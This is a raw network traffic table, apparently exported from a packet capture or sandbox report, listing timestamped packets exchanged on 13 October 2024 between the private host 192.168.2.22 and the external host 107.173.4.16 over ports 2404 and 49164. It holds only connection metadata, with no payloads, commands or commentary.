Oct 13, 2024 07:29:06.024348974 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.024400949 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.024432898 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.024451971 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.024463892 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.024494886 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.024527073 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.024550915 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.024558067 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.024593115 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.024621010 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.024626017 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.024667978 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.032613039 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.032644987 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.032677889 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.032871008 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.032953024 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.032985926 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.033003092 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.042448997 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.053957939 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.054008007 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.054039955 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.054173946 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.054847956 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.054879904 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.055031061 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.126336098 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.126404047 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.126437902 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.126470089 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.126503944 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.126533985 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.126532078 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.126532078 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.126566887 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.126600027 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.126600981 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.126632929 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.126663923 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.126663923 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.126698017 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.126729012 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.126734972 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.126760960 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.126792908 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.126823902 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.126854897 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.126890898 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.126996040 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.126996040 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.126996994 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.127027988 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.127059937 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.127064943 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.127091885 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.127130032 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.127149105 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.127161980 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.127194881 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.127209902 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.127227068 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.127258062 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.127276897 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.127290010 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.127325058 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.127346992 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.127595901 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.127646923 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.127649069 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.127680063 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.127711058 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.127724886 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.127743006 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.127774954 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.127820969 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.128072023 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.128103971 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.128137112 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.128160000 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.128168106 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.128201962 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.128233910 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.128237009 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.128268003 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.128396034 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.128616095 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.128628016 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.128648996 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.128680944 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.128695965 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.128711939 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.128743887 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.128767967 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.128776073 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.128807068 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.128828049 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.128839016 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.128870964 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.128901958 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.128921032 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.128935099 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.128987074 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.129200935 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.129272938 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.129303932 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.129328966 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.129337072 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.129369020 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.129400969 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.129426003 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.129434109 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.129467964 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.129482985 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.129808903 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.129841089 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.129864931 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.129873037 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.129906893 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.129937887 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.129959106 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.129970074 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.130002975 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.130021095 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.130038023 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.130103111 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.130357981 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.130389929 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.130440950 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.130445957 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.130472898 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.130506039 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.130517960 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.130537987 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.130568981 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.130589962 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.130599976 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.130631924 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.130645037 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.130662918 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.130695105 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.130712986 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.130726099 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.130758047 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.130789995 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.130805969 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.131536007 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.131597996 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.131731033 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.131746054 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.131759882 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.131774902 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.131795883 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.131812096 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.131818056 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.131869078 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.131886005 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.131900072 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.131913900 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.131918907 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.131928921 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.131946087 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.131948948 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.131977081 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.131994009 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.132014990 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.132030964 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.132075071 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.143937111 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.144150972 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.144182920 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.144215107 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.144246101 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.144278049 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.144309998 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.144319057 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.144319057 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.144319057 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.144583941 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.144644022 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.198632956 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.198676109 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.198712111 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.198765039 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.198797941 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.198828936 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.198846102 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.198846102 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.198860884 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.198894024 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.198914051 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.198925972 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.198940039 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.198957920 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.198990107 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.199021101 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.199024916 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.199053049 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.199065924 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.199089050 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.199119091 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.199223042 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.199254990 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.199286938 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.199292898 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.199362040 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.199435949 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.199469090 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.199502945 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.199536085 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.199558973 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.199706078 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.199738026 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.199791908 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.199825048 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.199856997 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.199888945 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.199920893 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.199940920 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.199954033 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.199986935 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.200037003 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.200109005 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.200191975 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.200223923 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.200274944 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.200361013 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.200392962 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.200424910 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.200457096 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.200478077 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.200650930 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.200683117 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.200715065 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.200737000 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.200746059 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.200782061 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.200809002 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.200833082 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.201097965 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.201134920 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.201167107 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.201179981 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.201200008 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.201231003 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.201251984 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.201262951 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.201297045 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.201328039 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.201345921 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.201380968 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.201414108 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.201447964 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.201464891 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.201781988 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.201797962 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.201811075 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.201845884 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.204087019 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.204160929 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.204175949 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.204211950 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.204308987 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.204415083 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.204428911 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.204442978 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.204457045 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.204472065 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.204487085 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.204518080 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.204518080 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.204518080 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.204610109 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.204624891 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.204639912 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.204654932 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.204685926 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.204808950 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.204823971 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.204838037 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.204853058 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.204865932 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.204951048 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.204998016 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.205020905 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.205035925 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.205153942 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.205167055 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.205168009 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.205184937 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.205202103 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.205228090 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.205300093 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.205358028 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.205372095 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.205382109 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.205387115 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.205403090 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.205611944 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.205626965 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.205641031 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.205656052 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.205662012 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.205697060 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.205791950 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.205815077 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.205837011 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.205849886 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.205863953 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.205866098 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.205882072 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.205904961 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.205918074 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.205952883 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.205959082 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.205976963 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.206008911 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.206291914 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.206306934 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.206321955 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.206337929 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.206346989 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.206382036 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.206543922 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.206593990 CEST	49164	2404	192.168.2.22	107.173.4.16
